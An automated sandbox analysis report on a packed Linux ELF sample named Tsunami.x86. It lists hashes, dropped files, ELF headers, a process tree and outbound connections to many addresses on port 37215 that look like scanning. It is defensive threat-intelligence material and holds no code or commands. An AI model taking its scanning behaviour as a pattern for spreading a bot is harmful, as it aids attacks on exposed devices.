                            SHA-256:09168A55356529C70901E12C8B89BD20B7B5AF32A9D0E7369588FCCB875E6BAB
                            SHA-512:AAC02ABC15CA1F5B461CD4452C48DFD4E316C98E52D799F277B29C737F8A080D35D6FB755E2E99A3341320E0977B1062F4C845DB055DCBB3C668CC8D1A8AA878
                            Malicious:false
                            Preview: # This is private data. Do not parse..NAME=gdm.STATE=opening.STOPPING=no.RUNTIME=/run/user/127.SERVICE_JOB=/org/freedesktop/systemd1/job/12052.REALTIME=1635740275216589.MONOTONIC=536737466.SESSIONS=c1.SEATS=seat0.ACTIVE_SESSIONS=.ONLINE_SESSIONS=c1.ACTIVE_SEATS=.ONLINE_SEATS=seat0.
                            /run/systemd/users/.#127osNmKY
                            Process:/lib/systemd/systemd-logind
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):282
                            Entropy (8bit):5.31469715356827
                            Encrypted:false
                            SSDEEP:6:SbFuFyL3BVgVuR257iesnAir/0Ixff6BgAN8uqQ2thQc2pb02/g2p9rwB:qgFq30VuR8L/ibBegANNkthQHtPYq9M
                            MD5:DB3A4666D03999D26206D2A19947AF8E
                            SHA1:DE8F85E88DAFCED3FA41A290ED9808A56818BA6D
                            SHA-256:DEF61AF673EFDE835F997543666520C444972252B91B6230B93F01F7A1FC095D
                            SHA-512:F15459F7ED39693A7003A3AE5411D1733F67D9052C38C6E374BB04CB06A6AD0626C2C1B00500134678E384384E5B24E3DA235774EEA25A810C105C8AF7903EA9
                            Malicious:false
                            Preview: # This is private data. Do not parse..NAME=gdm.STATE=opening.STOPPING=no.RUNTIME=/run/user/127.SERVICE_JOB=/org/freedesktop/systemd1/job/12303.REALTIME=1635740308474474.MONOTONIC=569995351.SESSIONS=c1.SEATS=seat0.ACTIVE_SESSIONS=.ONLINE_SESSIONS=c1.ACTIVE_SEATS=.ONLINE_SEATS=seat0.
                            /run/user/1000/pulse/pid
                            Process:/usr/bin/pulseaudio
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):5
                            Entropy (8bit):2.321928094887362
                            Encrypted:false
                            SSDEEP:3:HUWv:vv
                            MD5:4ABAE19106A78DC128B524B6D6E9DAB8
                            SHA1:6D2CFC182A8127D53908D5EECCEB040B265EFA66
                            SHA-256:F8FC87BE1D994DCE9D38FC24151AC8281CD03BA8F09A724119A6C0919283370F
                            SHA-512:B7867DD050E8480808DA4AAB6C36B05AC0B889389F1736F2E5CBDC0ADD2E4E7D7DE42D726A96E83CCB742C6E0FBBF28CC3F9435035391F89959640526D121781
                            Malicious:false
                            Preview: 5713.
                            /sys/fs/cgroup/systemd/user.slice/user-127.slice/user@127.service/dbus.socket/cgroup.procs
                            Process:/lib/systemd/systemd
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):5
                            Entropy (8bit):1.9219280948873623
                            Encrypted:false
                            SSDEEP:3:gvn:gvn
                            MD5:196AA999EC491ADF7DE5A4D879AB5BEF
                            SHA1:211E5387EE0EE597291574E42C709367A63A09EE
                            SHA-256:F4B8C9DA5B5FD1655815C2015DB2F45DDF14AAAB07771F09001E66184E68EAD7
                            SHA-512:BFAD98D63AFF1682D9DCD9982074EBA04F131477AB684AFA5AE8BC2DC647771D0097AA4EA714F0F5A02C8709AC05B63DE4C0C5F7E4CA35BAE2319D056D06DDE8
                            Malicious:false
                            Preview: 6265.
                            /sys/fs/cgroup/systemd/user.slice/user-127.slice/user@127.service/init.scope/cgroup.procs
                            Process:/lib/systemd/systemd
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):10
                            Entropy (8bit):2.5219280948873624
                            Encrypted:false
                            SSDEEP:3:narvn:arvn
                            MD5:E6EBAF58BA3420A7EDFD2585215099C1
                            SHA1:B4A6FD50A449F5BDAC15D20C0DBB01C50C1EE788
                            SHA-256:59128A690CA9CE9A93E8ABE4DB37A155AC494D34FF6CA7A9560422595466599A
                            SHA-512:859AFE03CDE7C8A83C4996B4F941E88E155BD3DB57A9410A04DC49AC148C01B69F4EA643CBD57389A9C4C9BEBE6D358C6E7A75F4217964C5BE5A6C61A25DCD60
                            Malicious:false
                            Preview: 7135.7136.
                            /sys/fs/cgroup/systemd/user.slice/user-127.slice/user@127.service/pulseaudio.service/cgroup.procs
                            Process:/lib/systemd/systemd
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):5
                            Entropy (8bit):1.9219280948873623
                            Encrypted:false
                            SSDEEP:3:tvn:d
                            MD5:435205AB74E18D7038507F5D0B143A6E
                            SHA1:21B782A3DAF8CA8185BD6C14695B62BD12778280
                            SHA-256:FF9A1B3EBFE15FD0A715434C43433966E100DC3005A584543AA2BCD760BF6320
                            SHA-512:FD745DA1F76353264019215DDFE0CF8F7BE369810B1FC5292941674746F68DF624571DFC5A6153C6981417CEDF86DD9041210BE63693ABECEB097636545EFF4C
                            Malicious:false
                            Preview: 6268.
                            /sys/fs/cgroup/unified/user.slice/user-127.slice/user@127.service/dbus.socket/cgroup.procs
                            Process:/lib/systemd/systemd
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):5
                            Entropy (8bit):1.9219280948873623
                            Encrypted:false
                            SSDEEP:3:gvn:gvn
                            MD5:196AA999EC491ADF7DE5A4D879AB5BEF
                            SHA1:211E5387EE0EE597291574E42C709367A63A09EE
                            SHA-256:F4B8C9DA5B5FD1655815C2015DB2F45DDF14AAAB07771F09001E66184E68EAD7
                            SHA-512:BFAD98D63AFF1682D9DCD9982074EBA04F131477AB684AFA5AE8BC2DC647771D0097AA4EA714F0F5A02C8709AC05B63DE4C0C5F7E4CA35BAE2319D056D06DDE8
                            Malicious:false
                            Preview: 6265.
                            /sys/fs/cgroup/unified/user.slice/user-127.slice/user@127.service/init.scope/cgroup.procs
                            Process:/lib/systemd/systemd
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):10
                            Entropy (8bit):2.5219280948873624
                            Encrypted:false
                            SSDEEP:3:narvn:arvn
                            MD5:E6EBAF58BA3420A7EDFD2585215099C1
                            SHA1:B4A6FD50A449F5BDAC15D20C0DBB01C50C1EE788
                            SHA-256:59128A690CA9CE9A93E8ABE4DB37A155AC494D34FF6CA7A9560422595466599A
                            SHA-512:859AFE03CDE7C8A83C4996B4F941E88E155BD3DB57A9410A04DC49AC148C01B69F4EA643CBD57389A9C4C9BEBE6D358C6E7A75F4217964C5BE5A6C61A25DCD60
                            Malicious:false
                            Preview: 7135.7136.
                            /sys/fs/cgroup/unified/user.slice/user-127.slice/user@127.service/pulseaudio.service/cgroup.procs
                            Process:/lib/systemd/systemd
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):5
                            Entropy (8bit):1.9219280948873623
                            Encrypted:false
                            SSDEEP:3:tvn:d
                            MD5:435205AB74E18D7038507F5D0B143A6E
                            SHA1:21B782A3DAF8CA8185BD6C14695B62BD12778280
                            SHA-256:FF9A1B3EBFE15FD0A715434C43433966E100DC3005A584543AA2BCD760BF6320
                            SHA-512:FD745DA1F76353264019215DDFE0CF8F7BE369810B1FC5292941674746F68DF624571DFC5A6153C6981417CEDF86DD9041210BE63693ABECEB097636545EFF4C
                            Malicious:false
                            Preview: 6268.
                            /tmp/server-0.xkm
                            Process:/usr/bin/xkbcomp
                            File Type:Compiled XKB Keymap: lsb, version 15
                            Category:dropped
                            Size (bytes):12040
                            Entropy (8bit):4.844996337994878
                            Encrypted:false
                            SSDEEP:192:QDyb2zOmnECQmwTVFfLaSLusdfVcqLkjoqdD//PJeCQ1+JdDx0s2T:QDyAxvYhFf+S62fzmp7/dMJ
                            MD5:AC37A4B84E9FB5FE9E63CE9367F31371
                            SHA1:E2D70CE4A01CB5F80F0C8B63EE856AE6FE8B0EFA
                            SHA-256:143E089EE7EB5E9BF088C19FC59A0EA7ED061AD3AE3E3CB5BC63BDFD86833DFF
                            SHA-512:3F683C4D4A3EEA88646E2BDB51BB79678B083944307811060AD0116773045F2D0245598E084310F8AC3934295E228D08B567FA6AA15FC3C9410B973AB4025664
                            Malicious:false
                            Preview: .mkx..............D.......................h.......<.....P.,%......|&......D.......NumLock.....Alt.....LevelThree..LAlt....RAlt....RControl....LControl....ScrollLock..LevelFive...AltGr...Meta....Super...Hyper...........evdev+aliases(qwerty)...!.....ESC.AE01AE02AE03AE04AE05AE06AE07AE08AE09AE10AE11AE12BKSPTAB.AD01AD02AD03AD04AD05AD06AD07AD08AD09AD10AD11AD12RTRNLCTLAC01AC02AC03AC04AC05AC06AC07AC08AC09AC10AC11TLDELFSHBKSLAB01AB02AB03AB04AB05AB06AB07AB08AB09AB10RTSHKPMULALTSPCECAPSFK01FK02FK03FK04FK05FK06FK07FK08FK09FK10NMLKSCLKKP7.KP8.KP9.KPSUKP4.KP5.KP6.KPADKP1.KP2.KP3.KP0.KPDLLVL3....LSGTFK11FK12AB11KATAHIRAHENKHKTGMUHEJPCMKPENRCTLKPDVPRSCRALTLNFDHOMEUP..PGUPLEFTRGHTEND.DOWNPGDNINS.DELEI120MUTEVOL-VOL+POWRKPEQI126PAUSI128I129HNGLHJCVAE13LWINRWINCOMPSTOPAGAIPROPUNDOFRNTCOPYOPENPASTFINDCUT.HELPI147I148I149I150I151I152I153I154I155I156I157I158I159I160I161I162I163I164I165I166I167I168I169I170I171I172I173I174I175I176I177I178I179I180I181I182I183I184I185I186I187I188I189I190FK13FK14FK15FK16FK17FK18
                            /var/lib/AccountsService/users/gdm.1HJVB1
                            Process:/usr/lib/accountsservice/accounts-daemon
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):61
                            Entropy (8bit):4.66214589518167
                            Encrypted:false
                            SSDEEP:3:urzMQvNT+PzKLrAan4R8AKn:gzMQIzKLrAa4M
                            MD5:542BA3FB41206AE43928AF1C5E61FEBC
                            SHA1:F56F574DAF50D609526B36B5B54FDD59EA4D6A26
                            SHA-256:730D9509D4EAA7266829A8F5A8CFEBA6BBDDD5873FC2BD580AD464F4A237E11A
                            SHA-512:D774B8F191A5C65228D1B3CA1181701CFCD07A3D91C5571B0DDF32AD3E241C2D7BDFC0697AB97DC10441EF9CDC8AEE5B19BC34E13E5C8B0B91AD06EEF42F5AEA
                            Malicious:false
                            Preview: [User].XSession=.Icon=/var/lib/gdm3/.face.SystemAccount=true.
                            /var/lib/AccountsService/users/gdm.2I6LB1
                            Process:/usr/lib/accountsservice/accounts-daemon
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):61
                            Entropy (8bit):4.66214589518167
                            Encrypted:false
                            SSDEEP:3:urzMQvNT+PzKLrAan4R8AKn:gzMQIzKLrAa4M
                            MD5:542BA3FB41206AE43928AF1C5E61FEBC
                            SHA1:F56F574DAF50D609526B36B5B54FDD59EA4D6A26
                            SHA-256:730D9509D4EAA7266829A8F5A8CFEBA6BBDDD5873FC2BD580AD464F4A237E11A
                            SHA-512:D774B8F191A5C65228D1B3CA1181701CFCD07A3D91C5571B0DDF32AD3E241C2D7BDFC0697AB97DC10441EF9CDC8AEE5B19BC34E13E5C8B0B91AD06EEF42F5AEA
                            Malicious:false
                            Preview: [User].XSession=.Icon=/var/lib/gdm3/.face.SystemAccount=true.
                            /var/lib/AccountsService/users/gdm.75G5B1
                            Process:/usr/lib/accountsservice/accounts-daemon
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):61
                            Entropy (8bit):4.66214589518167
                            Encrypted:false
                            SSDEEP:3:urzMQvNT+PzKLrAan4R8AKn:gzMQIzKLrAa4M
                            MD5:542BA3FB41206AE43928AF1C5E61FEBC
                            SHA1:F56F574DAF50D609526B36B5B54FDD59EA4D6A26
                            SHA-256:730D9509D4EAA7266829A8F5A8CFEBA6BBDDD5873FC2BD580AD464F4A237E11A
                            SHA-512:D774B8F191A5C65228D1B3CA1181701CFCD07A3D91C5571B0DDF32AD3E241C2D7BDFC0697AB97DC10441EF9CDC8AEE5B19BC34E13E5C8B0B91AD06EEF42F5AEA
                            Malicious:false
                            Preview: [User].XSession=.Icon=/var/lib/gdm3/.face.SystemAccount=true.
                            /var/lib/AccountsService/users/gdm.XCO5B1
                            Process:/usr/lib/accountsservice/accounts-daemon
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):61
                            Entropy (8bit):4.66214589518167
                            Encrypted:false
                            SSDEEP:3:urzMQvNT+PzKLrAan4R8AKn:gzMQIzKLrAa4M
                            MD5:542BA3FB41206AE43928AF1C5E61FEBC
                            SHA1:F56F574DAF50D609526B36B5B54FDD59EA4D6A26
                            SHA-256:730D9509D4EAA7266829A8F5A8CFEBA6BBDDD5873FC2BD580AD464F4A237E11A
                            SHA-512:D774B8F191A5C65228D1B3CA1181701CFCD07A3D91C5571B0DDF32AD3E241C2D7BDFC0697AB97DC10441EF9CDC8AEE5B19BC34E13E5C8B0B91AD06EEF42F5AEA
                            Malicious:false
                            Preview: [User].XSession=.Icon=/var/lib/gdm3/.face.SystemAccount=true.
                            /var/lib/gdm3/.cache/gdm/Xauthority
                            Process:/usr/lib/gdm3/gdm-x-session
                            File Type:X11 Xauthority data
                            Category:dropped
                            Size (bytes):104
                            Entropy (8bit):4.9303161813880365
                            Encrypted:false
                            SSDEEP:3:rg/WFllasO93D4bxuwENWFllasO93D4b6:rg/WFl2zixuxNWFl2zi6
                            MD5:950C73B9A04A2FA71DD2C8F60CE7DB60
                            SHA1:B762FEDEB3279C772C2C2F3A3B7830A215290EB2
                            SHA-256:4045BF76BE9EA53E9BD7864922830A8C13534730C3793719838040104E8A5A9D
                            SHA-512:F54A3599AC1FCA9CC29224B494372E1B7436D262FD18D93B5D61C25640DCD647D2EF4244AF877BA25A49F178EB931AD6991308DAED30CDF0B26B3918EBCE3096
                            Malicious:false
                            Preview: ....galassia....MIT-MAGIC-COOKIE-1...C.....H$..l.Z......galassia....MIT-MAGIC-COOKIE-1...C.....H$..l.Z..
                            /var/log/Xorg.0.log
                            Process:/usr/lib/xorg/Xorg
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):41599
                            Entropy (8bit):5.291268614981562
                            Encrypted:false
                            SSDEEP:384:TYO9YlIcUCeNYMgdSdpdEdXdRd0dbdmdQdPdKdLdgdvd+d1dFdMdud7dzDdG4duG:UOK+79BZ4QZxzDSZyZPo/1P
                            MD5:BDDBC9BCA381D50353BFA57F68273E16
                            SHA1:7E40DFA82EAEF5AADD33B990EA83D7F81730D82F
                            SHA-256:B04B60742F0BE6F2CEB5FE33A05EF58C6DC442EFD4E255D4662B1888A96B363F
                            SHA-512:D0C0A0474CF689FC4CA333FD82212455F4007F30803BFDE1FA2DFB76D19A53F5DBFB6BD658EFAFEE3BA6FACAFA9C4EF8F5578FB0791175DF7FA9367BDDC0C9E4
                            Malicious:false
                            Preview: [ 571.102] (--) Log file renamed from "/var/log/Xorg.pid-6719.log" to "/var/log/Xorg.0.log".[ 571.140] .X.Org X Server 1.20.11.X Protocol Version 11, Revision 0.[ 571.171] Build Operating System: linux Ubuntu.[ 571.239] Current Operating System: Linux galassia 5.4.0-72-generic #80-Ubuntu SMP Mon Apr 12 17:35:00 UTC 2021 x86_64.[ 571.378] Kernel command line: Patched by Joe: BOOT_IMAGE=/vmlinuz-5.4.0-72-generic root=/dev/mapper/ubuntu--vg-ubuntu--lv ro maybe-ubiquity.[ 571.724] Build Date: 06 July 2021 10:17:51AM.[ 571.773] xorg-server 2:1.20.11-1ubuntu1~20.04.2 (For technical support please see http://www.ubuntu.com/support) .[ 571.946] Current version of pixman: 0.38.4.[ 572.125] .Before reporting problems, check http://wiki.x.org..to make sure that you have the latest version..[ 572.178] Markers: (--) probed, (**) from config file, (==) default setting,..(++) from command line, (!!) notice, (II) informational,..(WW) warning, (EE) error, (NI) not implemented, (??)

                            Static File Info

                            General

                            File type:ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
                            Entropy (8bit):7.882890311864268
                            TrID:
                            • ELF Executable and Linkable format (Linux) (4029/14) 50.16%
                            • ELF Executable and Linkable format (generic) (4004/1) 49.84%
                            File name:Tsunami.x86
                            File size:28992
                            MD5:eeff9245e700bd5a5ad66e2b7da182e0
                            SHA1:4fc227c03eadaabb350fa2fffdf84ec47d707fb9
                            SHA256:35c466355eb2680e17f3727da23d045ae0a6a1abca1032a33138cdeea20478bf
                            SHA512:6e566f95d7c61ceee94fbc8fa0254366daaba107a5e2add1197fd9a7b13701320e915de274a5cea4f3466597b6faaddce765bd287de4c4c9201d246604d858a7
                            SSDEEP:768:WnBHJrCUUFFRs6tAlyuwRHT9OL/IZK5KDdzlFb2z1LfKzIV:OHJ9UFFdtQyHYLQuKxH2zd7
                            File Content Preview:.ELF....................@x..4...........4. ...(.....................Lp..Lp.............. ... ... ...................Q.td................................UPX!....................[.......w....ELF.......d....e..4...7. 2(.....[]w...F.."..'......?....... .\...p

                            Static ELF Info

                            ELF header

                            Class:ELF32
                            Data:2's complement, little endian
                            Version:1 (current)
                            Machine:Intel 80386
                            Version Number:0x1
                            Type:EXEC (Executable file)
                            OS/ABI:UNIX - Linux
                            ABI Version:0
                            Entry Point Address:0xc07840
                            Flags:0x0
                            ELF Header Size:52
                            Program Header Offset:52
                            Program Header Size:32
                            Number of Program Headers:3
                            Section Header Offset:0
                            Section Header Size:40
                            Number of Section Headers:0
                            Header String Table Index:0

                            Program Segments

                            TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                            LOAD0x00xc010000xc010000x704c0x704c4.37720x5R E0x1000
                            LOAD0xb200x8059b200x8059b200x00x00.00000x6RW 0x1000
                            GNU_STACK0x00x00x00x00x00.00000x6RW 0x4

                            Network Behavior

                            TimestampSource PortDest PortSource IPDest IP
                            Nov 1, 2021 04:15:50.280440092 CET1406537215192.168.2.23197.147.68.87
                            Nov 1, 2021 04:15:50.280445099 CET1406537215192.168.2.23197.116.46.154
                            Nov 1, 2021 04:15:50.280447960 CET1406537215192.168.2.23197.6.126.245
                            Nov 1, 2021 04:15:50.280461073 CET1406537215192.168.2.23197.210.94.82
                            Nov 1, 2021 04:15:50.280494928 CET1406537215192.168.2.23197.173.75.36
                            Nov 1, 2021 04:15:50.280500889 CET1406537215192.168.2.23197.171.222.87
                            Nov 1, 2021 04:15:50.280509949 CET1406537215192.168.2.23197.56.37.201
                            Nov 1, 2021 04:15:50.280519009 CET1406537215192.168.2.23197.63.201.206
                            Nov 1, 2021 04:15:50.280525923 CET1406537215192.168.2.23197.159.30.71
                            Nov 1, 2021 04:15:50.280528069 CET1406537215192.168.2.23197.240.253.181
                            Nov 1, 2021 04:15:50.280529022 CET1406537215192.168.2.23197.30.165.156
                            Nov 1, 2021 04:15:50.280543089 CET1406537215192.168.2.23197.26.135.245
                            Nov 1, 2021 04:15:50.280540943 CET1406537215192.168.2.23197.228.53.182
                            Nov 1, 2021 04:15:50.280561924 CET1406537215192.168.2.23197.40.49.5
                            Nov 1, 2021 04:15:50.280577898 CET1406537215192.168.2.23197.99.19.230
                            Nov 1, 2021 04:15:50.280594110 CET1406537215192.168.2.23197.77.128.68
                            Nov 1, 2021 04:15:50.280597925 CET1406537215192.168.2.23197.152.55.230
                            Nov 1, 2021 04:15:50.280606031 CET1406537215192.168.2.23197.231.24.141
                            Nov 1, 2021 04:15:50.280607939 CET1406537215192.168.2.23197.178.103.146
                            Nov 1, 2021 04:15:50.280611992 CET1406537215192.168.2.23197.230.34.85
                            Nov 1, 2021 04:15:50.280611992 CET1406537215192.168.2.23197.122.95.0
                            Nov 1, 2021 04:15:50.280613899 CET1406537215192.168.2.23197.196.13.53
                            Nov 1, 2021 04:15:50.280621052 CET1406537215192.168.2.23197.186.218.16
                            Nov 1, 2021 04:15:50.280632019 CET1406537215192.168.2.23197.217.233.211
                            Nov 1, 2021 04:15:50.280637026 CET1406537215192.168.2.23197.173.67.197
                            Nov 1, 2021 04:15:50.280651093 CET1406537215192.168.2.23197.78.88.49
                            Nov 1, 2021 04:15:50.280658960 CET1406537215192.168.2.23197.84.197.160
                            Nov 1, 2021 04:15:50.280718088 CET1406537215192.168.2.23197.209.173.189
                            Nov 1, 2021 04:15:50.280806065 CET1406537215192.168.2.23197.168.58.10
                            Nov 1, 2021 04:15:50.280817032 CET1406537215192.168.2.23197.134.252.119
                            Nov 1, 2021 04:15:50.280826092 CET1406537215192.168.2.23197.91.124.55
                            Nov 1, 2021 04:15:50.280827045 CET1406537215192.168.2.23197.174.8.68
                            Nov 1, 2021 04:15:50.280834913 CET1406537215192.168.2.23197.118.44.139
                            Nov 1, 2021 04:15:50.280838013 CET1406537215192.168.2.23197.88.151.97
                            Nov 1, 2021 04:15:50.280869961 CET1406537215192.168.2.23197.33.153.74
                            Nov 1, 2021 04:15:50.280879021 CET1406537215192.168.2.23197.134.59.145
                            Nov 1, 2021 04:15:50.280880928 CET1406537215192.168.2.23197.94.159.203
                            Nov 1, 2021 04:15:50.280889034 CET1406537215192.168.2.23197.50.214.184
                            Nov 1, 2021 04:15:50.280889988 CET1406537215192.168.2.23197.248.141.49
                            Nov 1, 2021 04:15:50.280889034 CET1406537215192.168.2.23197.51.27.10
                            Nov 1, 2021 04:15:50.280899048 CET1406537215192.168.2.23197.224.84.111
                            Nov 1, 2021 04:15:50.280905008 CET1406537215192.168.2.23197.128.46.99
                            Nov 1, 2021 04:15:50.280916929 CET1406537215192.168.2.23197.159.238.19
                            Nov 1, 2021 04:15:50.280922890 CET1406537215192.168.2.23197.218.144.7
                            Nov 1, 2021 04:15:50.280927896 CET1406537215192.168.2.23197.177.190.6
                            Nov 1, 2021 04:15:50.280939102 CET1406537215192.168.2.23197.216.164.178
                            Nov 1, 2021 04:15:50.280946970 CET1406537215192.168.2.23197.177.165.10
                            Nov 1, 2021 04:15:50.280951977 CET1406537215192.168.2.23197.207.231.136
                            Nov 1, 2021 04:15:50.280952930 CET1406537215192.168.2.23197.5.209.3
                            Nov 1, 2021 04:15:50.280968904 CET1406537215192.168.2.23197.168.164.22
                            Nov 1, 2021 04:15:50.280973911 CET1406537215192.168.2.23197.201.246.141
                            Nov 1, 2021 04:15:50.280980110 CET1406537215192.168.2.23197.210.194.124
                            Nov 1, 2021 04:15:50.280987978 CET1406537215192.168.2.23197.202.176.29
                            Nov 1, 2021 04:15:50.280991077 CET1406537215192.168.2.23197.107.137.31
                            Nov 1, 2021 04:15:50.280993938 CET1406537215192.168.2.23197.133.2.176
                            Nov 1, 2021 04:15:50.281014919 CET1406537215192.168.2.23197.204.230.106
                            Nov 1, 2021 04:15:50.281034946 CET1406537215192.168.2.23197.34.25.59
                            Nov 1, 2021 04:15:50.281044006 CET1406537215192.168.2.23197.183.138.35
                            Nov 1, 2021 04:15:50.281049967 CET1406537215192.168.2.23197.184.84.40
                            Nov 1, 2021 04:15:50.281066895 CET1406537215192.168.2.23197.159.186.225
                            Nov 1, 2021 04:15:50.281069994 CET1406537215192.168.2.23197.98.114.71
                            Nov 1, 2021 04:15:50.281085014 CET1406537215192.168.2.23197.69.4.51
                            Nov 1, 2021 04:15:50.281085968 CET1406537215192.168.2.23197.58.214.105
                            Nov 1, 2021 04:15:50.281090975 CET1406537215192.168.2.23197.101.167.4
                            Nov 1, 2021 04:15:50.281097889 CET1406537215192.168.2.23197.37.43.67
                            Nov 1, 2021 04:15:50.281099081 CET1406537215192.168.2.23197.108.252.84
                            Nov 1, 2021 04:15:50.281106949 CET1406537215192.168.2.23197.46.218.114
                            Nov 1, 2021 04:15:50.281111956 CET1406537215192.168.2.23197.202.26.73
                            Nov 1, 2021 04:15:50.281112909 CET1406537215192.168.2.23197.80.31.196
                            Nov 1, 2021 04:15:50.281117916 CET1406537215192.168.2.23197.93.237.152
                            Nov 1, 2021 04:15:50.281120062 CET1406537215192.168.2.23197.191.249.63
                            Nov 1, 2021 04:15:50.281125069 CET1406537215192.168.2.23197.104.220.42
                            Nov 1, 2021 04:15:50.281136036 CET1406537215192.168.2.23197.188.97.39
                            Nov 1, 2021 04:15:50.281136990 CET1406537215192.168.2.23197.213.188.155
                            Nov 1, 2021 04:15:50.281136990 CET1406537215192.168.2.23197.209.187.35
                            Nov 1, 2021 04:15:50.281138897 CET1406537215192.168.2.23197.156.225.83
                            Nov 1, 2021 04:15:50.281150103 CET1406537215192.168.2.23197.185.64.62
                            Nov 1, 2021 04:15:50.281151056 CET1406537215192.168.2.23197.118.34.84
                            Nov 1, 2021 04:15:50.281164885 CET1406537215192.168.2.23197.114.199.206
                            Nov 1, 2021 04:15:50.281171083 CET1406537215192.168.2.23197.47.5.180
                            Nov 1, 2021 04:15:50.281176090 CET1406537215192.168.2.23197.24.177.220
                            Nov 1, 2021 04:15:50.281177998 CET1406537215192.168.2.23197.215.21.75
                            Nov 1, 2021 04:15:50.281184912 CET1406537215192.168.2.23197.216.97.69
                            Nov 1, 2021 04:15:50.281193972 CET1406537215192.168.2.23197.35.234.131
                            Nov 1, 2021 04:15:50.281218052 CET1406537215192.168.2.23197.0.160.63
                            Nov 1, 2021 04:15:50.281230927 CET1406537215192.168.2.23197.253.161.190
                            Nov 1, 2021 04:15:50.281233072 CET1406537215192.168.2.23197.171.106.123
                            Nov 1, 2021 04:15:50.281238079 CET1406537215192.168.2.23197.131.75.218
                            Nov 1, 2021 04:15:50.281239986 CET1406537215192.168.2.23197.17.18.20
                            Nov 1, 2021 04:15:50.281255960 CET1406537215192.168.2.23197.235.86.6
                            Nov 1, 2021 04:15:50.281260967 CET1406537215192.168.2.23197.154.206.238
                            Nov 1, 2021 04:15:50.281261921 CET1406537215192.168.2.23197.101.96.82
                            Nov 1, 2021 04:15:50.281266928 CET1406537215192.168.2.23197.137.32.7
                            Nov 1, 2021 04:15:50.281266928 CET1406537215192.168.2.23197.200.235.139
                            Nov 1, 2021 04:15:50.281277895 CET1406537215192.168.2.23197.50.126.232
                            Nov 1, 2021 04:15:50.281289101 CET1406537215192.168.2.23197.140.205.186
                            Nov 1, 2021 04:15:50.281297922 CET1406537215192.168.2.23197.174.113.0
                            Nov 1, 2021 04:15:50.281300068 CET1406537215192.168.2.23197.189.24.216
                            Nov 1, 2021 04:15:50.281300068 CET1406537215192.168.2.23197.160.157.105
                            Nov 1, 2021 04:15:50.281320095 CET1406537215192.168.2.23197.47.119.141

                            HTTP Request Dependency Graph

                            • 127.0.0.1:80
                            • 192.168.0.14:80

                            System Behavior

                            Analysis Process: Tsunami.x86 PID: 5244 Parent PID: 5117

                            General

                            Start time:04:15:49
                            Start date:01/11/2021
                            Path:/tmp/Tsunami.x86
                            Arguments:/tmp/Tsunami.x86
                            File size:28992 bytes
                            MD5 hash:eeff9245e700bd5a5ad66e2b7da182e0

                            Analysis Process: Tsunami.x86 PID: 5245 Parent PID: 5244

                            General

                            Start time:04:15:49
                            Start date:01/11/2021
                            Path:/tmp/Tsunami.x86
                            Arguments:n/a
                            File size:28992 bytes
                            MD5 hash:eeff9245e700bd5a5ad66e2b7da182e0

                            Analysis Process: Tsunami.x86 PID: 5246 Parent PID: 5245

                            General

                            Start time:04:15:49
                            Start date:01/11/2021
                            Path:/tmp/Tsunami.x86
                            Arguments:n/a
                            File size:28992 bytes
                            MD5 hash:eeff9245e700bd5a5ad66e2b7da182e0

                            Analysis Process: Tsunami.x86 PID: 5247 Parent PID: 5245

                            General

                            Start time:04:15:49
                            Start date:01/11/2021
                            Path:/tmp/Tsunami.x86
                            Arguments:n/a
                            File size:28992 bytes
                            MD5 hash:eeff9245e700bd5a5ad66e2b7da182e0

                            Analysis Process: Tsunami.x86 PID: 5248 Parent PID: 5245

                            General

                            Start time:04:15:49
                            Start date:01/11/2021
                            Path:/tmp/Tsunami.x86
                            Arguments:n/a
                            File size:28992 bytes
                            MD5 hash:eeff9245e700bd5a5ad66e2b7da182e0

                            Analysis Process: Tsunami.x86 PID: 5249 Parent PID: 5245

                            General

                            Start time:04:15:49
                            Start date:01/11/2021
                            Path:/tmp/Tsunami.x86
                            Arguments:n/a
                            File size:28992 bytes
                            MD5 hash:eeff9245e700bd5a5ad66e2b7da182e0

                            Analysis Process: Tsunami.x86 PID: 5250 Parent PID: 5245

                            General

                            Start time:04:15:49
                            Start date:01/11/2021
                            Path:/tmp/Tsunami.x86
                            Arguments:n/a
                            File size:28992 bytes
                            MD5 hash:eeff9245e700bd5a5ad66e2b7da182e0

                            Analysis Process: Tsunami.x86 PID: 5251 Parent PID: 5245

                            General

                            Start time:04:15:49
                            Start date:01/11/2021
                            Path:/tmp/Tsunami.x86
                            Arguments:n/a
                            File size:28992 bytes
                            MD5 hash:eeff9245e700bd5a5ad66e2b7da182e0

                            Analysis Process: Tsunami.x86 PID: 5252 Parent PID: 5245

                            General

                            Start time:04:15:49
                            Start date:01/11/2021
                            Path:/tmp/Tsunami.x86
                            Arguments:n/a
                            File size:28992 bytes
                            MD5 hash:eeff9245e700bd5a5ad66e2b7da182e0

                            Analysis Process: Tsunami.x86 PID: 5253 Parent PID: 5245

                            General

                            Start time:04:15:49
                            Start date:01/11/2021
                            Path:/tmp/Tsunami.x86
                            Arguments:n/a
                            File size:28992 bytes
                            MD5 hash:eeff9245e700bd5a5ad66e2b7da182e0

                            File Activities

                            Analysis Process: systemd PID: 5269 Parent PID: 1

                            General

                            Start time:04:15:52
                            Start date:01/11/2021
                            Path:/usr/lib/systemd/systemd
                            Arguments:n/a
                            File size:1620224 bytes
                            MD5 hash:9b2bec7092a40488108543f9334aab75

                            Analysis Process: sshd PID: 5269 Parent PID: 1

                            General

                            Start time:04:15:52
                            Start date:01/11/2021
                            Path:/usr/sbin/sshd
                            Arguments:/usr/sbin/sshd -t
                            File size:876328 bytes
                            MD5 hash:dbca7a6bbf7bf57fedac243d4b2cb340

                            File Activities

                            Analysis Process: systemd PID: 5272 Parent PID: 1

                            General

                            Start time:04:15:53
                            Start date:01/11/2021
                            Path:/usr/lib/systemd/systemd
                            Arguments:n/a
